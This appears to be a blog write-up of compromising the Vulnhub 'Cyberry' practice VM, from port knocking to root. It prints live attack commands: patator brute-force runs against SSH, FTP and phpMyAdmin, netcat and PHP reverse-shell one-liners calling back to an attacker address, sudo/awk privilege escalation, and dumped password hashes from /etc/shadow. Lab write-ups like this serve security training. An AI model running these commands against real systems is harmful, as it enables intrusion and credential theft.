User Rating: 0 / 5

Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

Greetings!

Few weeks ago I finished a very interesting Vulnhub.com boot2root challenge named Cyberry.

This challenge contains a logic task and that's why I was close to give up with this challenge, but finally it was solved and I found it really nice and interesting. Welcome to this post and see how I did it.

To find VM ip address use arp-scan: arp-scan -I vboxnet0 -l

 

As usually first step is port scan, at the first scan 666/tcp was opened, but later when I started service detection scan it started to be closed and never was open again.

PORT    STATE  SERVICE VERSION
21/tcp  open   ftp     ProFTPD 1.3.5b
22/tcp  open   ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 97:7c:74:2b:f1:28:15:dc:8d:67:e0:75:75:44:e9:ad (RSA)
|   256 29:62:8e:10:9b:97:79:3a:18:e6:c0:0b:f7:ec:f8:ee (ECDSA)
|_  256 d9:ba:53:54:78:5d:67:4e:b1:bc:9f:3f:0f:69:83:ab (EdDSA)
80/tcp  open   http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Coming Soon
666/tcp closed doom


Some files and web directories were uncovered with standard dirlist:
/.bashrc
/config.php
/css
/images
/index.html
/login.php
/phpmyadmin
/register.php
/logout.php
/welcome.php

At the meantime I was looking to the page source and found some artifacts in base64 encoding:

<!-- bmljZSB0cnkh -->                           //nice try!
<!-- bm90aGluZyB0byBzZWUgaGVyZSE= -->           //nothing to see here!
<!-- dGltZSB0byBtb3ZlIG9uIQ== ->                //time to move on!
<!-- c2VjcmV0ZmlsZS5odG1s ->                    //secretfile.html
<!-- d29yay1pbi1wcm9ncmVzcy5wbmc= -->           //work-in-progress.png

Lets have a look at http://192.168.56.101/secretfile.html.
Congratulations... you must be an uberhacker!
Can you progress any further??
01100010 01101111 01110011 01110011 00101110 01100111 01101001 01100110

And decoded..
98 111 115 115 46 103 105 102
boss.gif -> http://192.168.56.101/boss.gif

So, it is just a gif =)

 

Lets have a look in work-in-progress.png because it is not an image, was not displayed in the web browser:

wget http://192.168.56.101/work-in-progress.png
file work-in-progress.png
work-in-progress.png: ASCII text
cat work-in-progress.png
edocrq

It is a QR code: http://192.168.56.101/edocrq
Decoded:https://zxing.org/w/decode - berrypedia.html

And the same berrypedia.html was got from http://IP/login.php from sources, so probably it is a right way.

Lets create new account cyberry:cyberry and sign-in...Admin panel with nothing...Ok, lets go back to berrypedia.html and look to the page source.

 Ok, we know first username Chuck or chuck. And know second username Halle or halle.

Next attack which I tried was a brute-force attack in phpmyadmin with usernames chuck/Chuck/halle/Halle - no results. I used a patator to brute-force phpmyadmin.

patator http_fuzz url=http://192.168.56.101/phpmyadmin/index.php method=POST body='pma_username=chuck&pma_password=FILE0&server=1&target=index.php&lang=en&token=' 0=/usr/share/john/password.lst before_urls=http://192.168.56.101/phpmyadmin/index.php follow=1 accept_cookie=1 -x ignore:fgrep='Access denied for user' -l /tmp/phpmyadmin_cyberry

OK, next attack was a brute-force on ftp service with the same usernames - no results...

At this moment I changed password lists several times and was stuck and ready to give up, but decided try harder and found something interesting.

In berrypedia.html
There are few images like strawberry, etc. One is a gif with text MISSED - http://192.168.56.101/hidden.gif, and a previous is rotated picture with l changed to 1: http://192.168.56.101/placeho1der.jpg
Exif meta - nothing....But placeho1der.jpg looks strange, first of all it contains changed letter and second one it a mirrored picture with negative effect. At this moment I was also trying to find some hidden web directories or files and also nothing, so, I decided to apply mirror and negative changes back in to the picture.

And the result is below

What does it mean, I read VM description again and found a hint:
'you will almost certainly require some form of internet access (Search engine) at your disposal to move forward past some of the challenges.'

I used google to find any information about Port of Tacoma, read it and still did not understand what to do. At the same moment patator was working on big password lists =)

Next my idea was to split picture and find people, I used Yandex pictures search to understand musicians names, from left corner to right:
1 Smiley Lewis https://en.wikipedia.org/wiki/Smiley_Lewis
2 Dave Edmunds https://en.wikipedia.org/wiki/Dave_Edmunds
3 Gale Storm https://en.wikipedia.org/wiki/Gale_Storm
4 Fats Domino https://en.wikipedia.org/wiki/Fats_Domino_discography

And what to do with it, who are they linked with port of Tacoma...? Ok, created a list of additional usernames, tried to brute-force - nothing....

I tried to hack web site once again...no additional files, no dirs, nothing....and I saw once again a message from VM developer about search engine and tried to ask google about all musicians names in one search request:
Smiley Lewis Dave Edmunds Gale Storm Fats Domino

And a song 'I hear you knocking' is a first result: https://en.wikipedia.org/wiki/I_Hear_You_Knocking

All these musicians song this song in different years and text is about knocking, at this moment my mind was broken and a crazy idea came - PORT KNOCKING?!

Ok, found all years: 1955 1970 1955 1961

It is a 24 variants of permutations, lets create a list:
1955,1970,1955,1961
1955,1970,1961,1955
1955,1955,1970,1961
1955,1955,1961,1970
1955,1961,1970,1955
1955,1961,1955,1970
1970,1955,1955,1961
1970,1955,1961,1955
1970,1955,1955,1961
1970,1955,1961,1955
1970,1961,1955,1955
1970,1961,1955,1955
1955,1955,1970,1961
1955,1955,1961,1970
1955,1970,1955,1961
1955,1970,1961,1955
1955,1961,1955,1970
1955,1961,1970,1955
1961,1955,1970,1955
1961,1955,1955,1970
1961,1970,1955,1955
1961,1970,1955,1955
1961,1955,1955,1970
1961,1955,1970,1955

A simple way to port knock on local VM of course:

for p in 1955 1970 1955 1961; do nmap -Pn --max-retries 0 -p $p 192.168.56.101; done
and of course after do nmap scan:
nmap -p- 192.168.56.101

Nmap scan takes 3min, there is no need to create any script to do it automatically in case of only 24 permutations.

On the seven permutations we got a result! It was amazing, because I spent two days trying to find any further step to do!
for p in 1970 1955 1955 1961; do nmap -Pn --max-retries 0 -p $p 192.168.56.101; done
61955/tcp open   unknown

Connect to this port with nc and it is an Apache.
nc -nv 192.168.56.101 61955
(UNKNOWN) [192.168.56.101] 61955 (?) open
?
HTTP/1.1 400 Bad Request
Date: Mon, 22 Jan 2018 14:12:10 GMT
Server: Apache/2.4.25 (Debian)

 

 It is the same web server but on another "protected" port, web dirs and files are the same.

Registrations are closed, we could not login...http://192.168.56.101:61955/register.php

Default page source is without base64 encoded data and a linked twitter account opens a page with strange data...
http://192.168.56.101:61955/H

Using google I found that it is a brainfuck (https://en.wikipedia.org/wiki/Brainfuck), lets use https://www.splitbrain.org/_static/ook/ to visualize found data.
Copy paste and wait...It is better to copy-paste only 1 line, otherwise it takes a long period of time. (I did not wait to the end...)

Hello World!
team members
chuck
halle
nick
terry
mary
kerry
pw: bakeoff

 Update a userlist and fire up patator against ftp, ssh and phpmyadmin:

Lets fireup patator once again against ftp service:
patator ftp_login host=192.168.56.101 user=FILE0 password=bakeoff 0=userlist.txt -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500

For ftp and ssh mary has password==bakeoff, for phpmyadmin not works.

Firstly I checked ftp service, ls command was running too long and I switched to ssh login.
Connection to ssh with username mary terminates connection immediately...OMG
FTP was loading too long and I decided to restart the machine.

After restart ftp service works good:
ftp> ls -a
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwt   3 mary     mary         4096 Nov 29 22:29 .
drwxrwxrwt   3 mary     mary         4096 Nov 29 22:29 ..
drwxr-xr-x   2 mary     mary         4096 Nov 29 22:39 .bash_history
-rwxrwxrwt   1 mary     mary          220 Nov 20 00:34 .bash_logout
-rwxrwxrwt   1 mary     mary         3515 Nov 20 00:34 .bashrc
-rwxrwxrwt   1 mary     mary          675 Nov 20 00:34 .profile
226 Transfer complete
Lets check .bash_history directory:

ftp> ls -lah
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 mary     mary         4.0k Nov 29 22:39 .
drwxrwxrwt   3 mary     mary         4.0k Nov 29 22:29 ..
-rw-r--r--   1 mary     mary           64 Nov 29 22:35 .reminder.enc
-rw-r--r--   1 mary     mary          122 Nov 29 22:39 .trash
226 Transfer complete


Review these two files.
file .reminder.enc
.reminder.enc: openssl enc'd data with salted password
file .trash
.trash: ASCII text

cat .trash
Most common passwords 2017 (Top 10)

123456
123456789
qwerty
12345678
111111
1234567890
1234567
password
123123
987654321

But I do not know which cipher was used to encrypt reminder....

thank you https://www.securesolutions.no/cipher-and-password-bruteforcing-with-openssl/ for a script =)

while read -r line; do while read -r line2; do openssl $line -v -d -in reminder.enc -pass pass:$line2 -out cipherout/$line-$line2.txt; echo $line $line2;done < trash.txt; done < ciphers.txt

Create a list of possible ciphers with command: openssl enc -ciphers
Modify a script and run, we will have a lot of data in the folder cipherout.

Not working, WHY?! => forgot message digest type.


Openssl digests:
-md4            to use the md4 message digest algorithm
-md5            to use the md5 message digest algorithm
-ripemd160      to use the ripemd160 message digest algorithm
-sha            to use the sha message digest algorithm
-sha1           to use the sha1 message digest algorithm
-sha224         to use the sha224 message digest algorithm
-sha256         to use the sha256 message digest algorithm
-sha384         to use the sha384 message digest algorithm
-sha512         to use the sha512 message digest algorithm
-whirlpool      to use the whirlpool message digest algorithm

while read -r line; do while read -r line2; do openssl $line -v -d -md md5 -in reminder.enc -pass pass:$line2 -out cipherout/$line-$line2.txt; echo $line $line2;done < trash.txt; done < ciphers.txt

Started from md4 I found digest algorithm very fast - its is md5.
How to find a result? file * and find ASCII text, if it was decrypted successfully: file * | grep ASCII

So the decrypted message is 'In case I forget, my login is dangleberry69' and it is the second password for user mary:

Where to try it:
1) phpmyadmin - not works
2) website login form - works

Website login form under user mary uncovered 2 additional web resources:
http://192.168.56.101:61955/vidplayer.html - with several video uploaded
http://192.168.56.101:61955/ub3r-s3cur3/index.php - looks like some request sending script written in php

Lets test for command injection, symbols for testing could be found on Owasp web site or in SecLists:
{ }  ( ) < > & * ‘ | = ? ; [ ]  $ – # ~ ! . ” %  / \ : + , `

I used Burp Intruder to test it.

Command injection with several special chars: & | ;
I checked it with ls -lah command current directory:
-rw-r--r-- 1 www-data www-data  312 Nov 29 23:30 index.php
-rw-r--r-- 1 www-data www-data   54 Jan 22 17:24 ls
-rw-r--r-- 1 www-data www-data  644 Nov 25 11:45 nb-latin
drwxrwxrwx 2 www-data www-data 4.0K Dec  8 14:57 teamdocs

http://192.168.56.101:61955/ub3r-s3cur3/nb-latin - file with latin words
http://192.168.56.101:61955/ub3r-s3cur3/teamdocs - no files

There a lot of ways what to do next, first try of course is netcat reverse connection.

Got a connection, so netcat is installed with -e option =)

Mysql creds was found:
cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'www-data');
define('DB_PASSWORD', 'wwwelcome');
define('DB_NAME', 'login2');

Got a several user hashes:

db login
root:$2y$10$CAad./2tdt.D.cGbroVJDupoUfeL.f5m8L05xUux75tmyvnknSI1e
Smith:$2y$10$QyrXRjl6449dTmuo0gKhK.wJAEAYlshtAmIerfe3IztGVHH0UUm52
9876sfi:$2y$10$CnPyEt64nLbfKCckV9FCa.W5Aknu89vTLx63Pzo2FPmD85dS4Sgju

db login2
mary:$2y$10$HSv6IOAa5MXZT84S.Tkqouj52NstCq3YAxlSankL0Q6JbZiZiMFJe - already known password

db mysql - not found in rockyou
root:*280DE14C8E070782762B9E374049DF70C9B136B5
phpmyadmin:*DAECA523947440E96BB380AF5611FD883EADE3BD
www-data:*276A01899113EB9267FB32FD4E1A579CFA766300

Lets find something interesting on this host in different directories:

/home/kerry/.nb
cat .access

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABA...5Tmf9Zr nick@cyberry

=> Nick can connect over ssh.

pwd
/home/nick
ls -lah
total 132K
drwxr-xr-x 3 nick  nick 4.0K Dec  7 16:44 .
drwxr-xr-x 9 root  root 4.0K Nov 29 23:58 ..
-rw------- 1 nick  nick  16K Dec  7 16:51 .bash_history
-rw-r--r-- 1 nick  nick  220 Nov 20 22:44 .bash_logout
-rw-r--r-- 1 nick  nick 3.5K Nov 20 22:44 .bashrc
-rw-r--r-- 1 nick  nick  675 Nov 20 22:44 .profile
drwxr-xr-x 2 nick  nick 4.0K Nov 30 01:07 .ssh
-rw-r--r-- 1 nick  nick 8.0K Nov 22 16:23 blackberry
-rw-r--r-- 1 nick  nick 6.1K Nov 22 16:23 blueberry
-rw-r--r-- 1 nick  nick 8.2K Nov 22 16:27 elderberry
-rw-r--r-- 1 nick  nick  435 Nov 22 16:19 email-to-chuck
-rw-r--r-- 1 nick  nick  231 Nov 22 16:19 email-to-halle
-rw-r--r-- 1 nick  nick  797 Dec  7 01:02 email-to-mary
-rw-r--r-- 1 nick  nick  252 Nov 30 01:34 email-to-terry - email to terry in latin, and there was a list with latin words
-rwxr-xr-x 1 nick  nick 7.3K Nov 21 20:22 esp
-rw-r--r-- 1 nick  nick 3.4K Nov 22 16:22 gooseberry
-rwx------ 1 terry nick  629 Nov 22 15:48 invoke.sh - this should be interesting
-rwx------ 1 terry nick 9.8K Nov 23 17:23 makeberry - this should be interesting
-rw-r--r-- 1 nick  nick 5.9K Nov 22 16:26 raspberry
-rw-r--r-- 1 nick  nick 8.7K Nov 22 16:22 strawberry

pwd
/home/chuck
-rw------- 1 chuck chuck  683 Dec  7 16:51 .bash_history
-rw-r--r-- 1 chuck chuck  220 Nov 19 13:18 .bash_logout
-rw-r--r-- 1 root  root  9.0K Nov 30 22:14 .bashrc
drwx------ 3 chuck chuck 4.0K Nov 30 23:26 .deleted - should be interesting
-rw-r--r-- 1 chuck chuck  675 Nov 19 13:18 .profile

Also found phpmyadmin password:
cat config-db.php
<?php
..
$dbuser='phpmyadmin';
$dbpass='n9oKHVKnyBSd';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';

Nick had been logged over ssh, he sent en email in latin to terry, lets try to brute his password with nb-latin wordlist

Ok, we got an ssh password:

patator ssh_login host=192.168.56.101 user=nick password=FILE0 0=nb-latin
18:37:08 patator    INFO - 0     38    0.103 | custodio                           |    69 | SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u1

Nick has sudo rights:

sudo -l
Matching Defaults entries for nick on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nick may run the following commands on cyberry:
    (terry) SETENV: NOPASSWD: /home/nick/makeberry
    (terry) SETENV: NOPASSWD: /home/nick/invoke.sh

 

Lets see what happens when we run invoke.sh and makeberry under nick as a terry.
sudo -u terry ./makeberry
Hey there terry, hows it hanging?
Give me a word and I'll make a berry out of it!
wtf
Hmm...interesting....I bet 'wtfberries' are extremely juicy!

sudo -u terry ./invoke.sh
readlink: missing operand
Try 'readlink --help' for more information.
/home/nick/invoke.sh: 24: shift: can't shift that many

readlink --help - >nice, probably we can do privilege escalation.

sudo -u terry ./invoke.sh -h
usage: invoke.sh -e KEY=VALUE prog [args...]

Ok, lets try to execute nc, because we know that -e presents in nc installation.
sudo -u terry ./invoke.sh /bin/nc -e /bin/bash 192.168.56.1 31338

Ok, now we are terry =)

invoke.sh code
cat invoke.sh
#!/bin/sh

while getopts "dte:h?" opt ; do
  case "$opt" in
    h|\?)
      printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
      exit 0
      ;;
    t)
      tty=1
      gdb=1
      ;;
    d)
      gdb=1
      ;;
    e)
      env=$OPTARG
      ;;
  esac
done

shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
  else
    exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
  fi
else
  exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi

Lets check terry's bash history file.

cat .bash_history
...

sudo -E -u halle /usr/bin/awk 'BEGIN {system("/bin/sh")}'
su kerry
sudo -l
cd /home/terry
ls -ahlR
sudo -u halle awk 'BEGIN {system("/bin/sh")}'
...

Probably awk as halle, check sudo:

sudo -l
Matching Defaults entries for terry on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User terry may run the following commands on cyberry:
    (halle) SETENV: NOPASSWD: /usr/bin/awk

Now I will post steps fast, because it is so interesting and I did it in few minutes:

Yeah, we can read halle data...

Got a command from bash_history:
sudo -E -u halle /usr/bin/awk 'BEGIN {system("/bin/sh")}'
id
uid=1001(halle) gid=1001(halle) groups=1001(halle)

Now we are halle =)
and check bash_history file:

cat .bash_history
http://192.168.179.128/php-rs.php
wget http://192.168.179.128/php-rs.php
..
sudo -E -u chuck /usr/bin/php -r '$sock=fsockopen("192.168.179.128",443);exec("/bin/sh -i <&3 >&3 2>&3");'
..
sudo -l
Matching Defaults entries for halle on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User halle may run the following commands on cyberry:
    (chuck) SETENV: NOPASSWD: /usr/bin/php

Lets catch reverse from chuck =)
sudo -E -u chuck /usr/bin/php -r '$sock=fsockopen("192.168.56.1",31339);exec("/bin/sh -i <&4 >&4 2>&4");'

$ id
uid=1000(chuck) gid=1000(chuck) groups=1000(chuck),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Lets check chukc bash history file:

$ cat .bash_history
..
cd /home/chuck/.deleted
..
chmod 700 .deleted
..

And in .deleted there are emails:

$ cat deleted
From:           Berry, Chuck (chuckberry@cyberry)
Sent:           Wednesday, November 22, 2017 2:52pm
To:             Nick, Chuck (nickberry@cyberry)
Subject:        Re: Christmas Meal


Thanks Nick, that might just help me out!

He did give me a few minor clues...

The password starts with "che" and ends with "rry"

letter e is used three times
letter c is used twice
letter r is used twice
letter b is used twice
letter a is used twice

The only other letters in the password were h,w,m & y

I think I'll probably have to write a little script to bruteforce SSH
with what I already know. If I get it done before close of business
I'll get onto sorting out the Christmas meal. Promise!

Thanks again

-------------------------------------------------------------------

Ah ok buddy. I don't know if it helps you in any way
but I saw the password jotted down on a post-it note in his office
the other day! I can't recall it exactly but I do remember it being
a concatenated 4-word password....You know like "eatberriesandsmile"

It wasn't that, but it was something like that.... in fact I'm pretty
sure one of those four words was actually latin... Now that I'm thinking
about it I'm pretty sure it was "baca".... well 99% sure.
I've been studying latin for a few months now, so it kinda
stuck in the memory

Please don't tell anyone I told you this b.t.w! :-)

-------------------------------------------------------------------

and chuck was connecting as root:


/home/chuck/.deleted/ssh_stuff
$ ls -lah
total 12K
drwx------ 2 chuck chuck 4.0K Nov 30 23:27 .
drwx------ 3 chuck chuck 4.0K Nov 30 23:26 ..
-rw-r--r-- 1 chuck chuck  394 Nov 30 23:27 id_rsa.pub
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAA...I4sal root@cyberry

 

Lets try to reconstruct the password for root from emails =)
1) The password starts with "che" and ends with "rry"
2) letter e is used three times
   letter c is used twice
   letter r is used twice
   letter b is used twice
   letter a is used twice
3) The only other letters in the password were h,w,m & y
4) I can't recall it exactly but I do remember it being a concatenated 4-word password....You know like "eatberriesandsmile"
5) in fact I'm pretty sure one of those four words was actually latin... Now that I'm thinking about it I'm pretty sure it was "baca"....

Ok, there are 5 rules how root password was constructed, lets try to build a list of possible passwords.

Third column how many letters left:

e - 3 in che:                   2e
c - 2 in che and baca:          0c
r - 2 in rry:                   0r
b - 2 in baca:                  1b
a - 2 in baca:                  0a
h - 1 in che:                   0h
w - 1                           1w
m - 1                           1m
y - 1 in rry:                   0y

At the end we have: 2e 1b 1w 1m = 5 letters and + (3+4+3) => probably  it should be a 15 letters password, if I understand 'The only other letters in the password were..'

So, we have several possible variants of the password, based on that the smallest word contains 2 letters:


Something like this:
che@baca@@@@rry
che@@baca@@@rry
che@@@baca@@rry
che@@@@baca@rry


It should 4096 possible passwords, easy to brute =)

At this moment I was thinking...what if h,w,m and y appears more then 1 time or some letters are in the upper case!? But lets create a dictionary and check current type of password.

I used crunch to do it.

-d 2@ allows for only 2 duplicate lowercase letters

crunch 15 15 ebwm -t che@baca@@@@rry -d 2@ -o try1.txt //with -d 2@ I had en error Floating point exception, so solution is simple create 4 different lists and put it to one list.

crunch 15 15 ebwm -t che@baca@@@@rry -o try1.txt
crunch 15 15 ebwm -t che@@baca@@@rry -o try2.txt
crunch 15 15 ebwm -t che@@@baca@@rry -o try3.txt
crunch 15 15 ebwm -t che@@@@baca@rry -o try4.txt

Finally we have a 4096 possible passwords (around 20 minutes to bruteforce):
cat try1.txt try2.txt try3.txt try4.txt > root_passwd.txt

It is patator's time =)

patator ssh_login host=192.168.56.101 user=root password=FILE0 0=root_passwd.txt -x ignore:mesg='Authentication failed.'

and got a password!
patator    INFO - 0     38    0.065 | chewbacabemerry                    |   589 | SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u1

So my suppose was correct that password is 15 letters length.

root@cyberry:~# id
uid=0(root) gid=0(root) groups=0(root)


root@cyberry:~# cat /etc/shadow
root:$6$te.eewbq$WAgPhhjKj6v/k7N/4HPa4JqAGwXi0rpvZI47xddBfr6R2WTL1SARVDa9obYhIId4WVP67pgF6HSELPb9WMWHx1:17489:0:99999:7:::
www-data:$6$8xjJVTCi$/T6OIrafXBQREpfGuncVOY4YBU7wOZ3hSPLwXKiRtXqxD1hQb8JF9/N5OFXz932Cn/8PpLM7SMKtE6w44boEC1:17499:0:99999:7:::
chuck:$6$s9LPpUwD$efIyRl3u/iiNuQ903uGJvPTs.xc9cUwFKK5y6oRjXFAc88zwP5A7hS3DkMXmPn8D/ecO0dB/oAOZZ8JTLMFYt/:17489:0:99999:7:::
halle:$6$IeIbT/1j$GDsNvwOcAr.SIEr1TYTUlagKO9TnoFq/zMfHm/5k4fnJba/9OfT80PHenNey.mL/9ry/9Hzs2J7lnEpz3vSef.:17500:0:99999:7:::
mary:$6$f.YK391e$JNbSXzCD7Y3tMJEAQgIXXmEwg1nNsO7JpuSd0Ja/5h.VziH6WdK8Lk6UNT./f6AaZCpTVGFGXqpJRRjnRqVMI1:17490:0:99999:7:::
nick:$6$pgZe1S05$Bxw/TxZHl/l2oqH.jzJFhgU.n8UGs5ilKnQNnzYqBlvobXoHf/p4lBnhxByae3Z8w9yhHV2aIDRT.f3oZNcas/:17500:0:99999:7:::
terry:$6$EsoCG2kQ$o2rDKtH47q0sg9s8.pNUFquLrwdw/dEO2kpsA5nC4BXmH5rWWQ1EaLpsQV9NyyVP/zEjETv.vNkA/hP.dxDxe1:17491:0:99999:7:::
kerry:$6$zBP3DrFv$bFeFJzDGSzCKX/xR3y3yOSpHov1fmKO/.LWmWPgElNmOKsaasGfx9mv/iuLVDVSZLo17soNH.9VMsJLcicuUH/:17499:0:99999:7:::


This is the end, I saw 2 binaries and got strings from it, did not try to do anything else with it.

 

I hope you like this write-up,

Thank you for reading and cyberry for this VM=)

Add comment


Security code
Refresh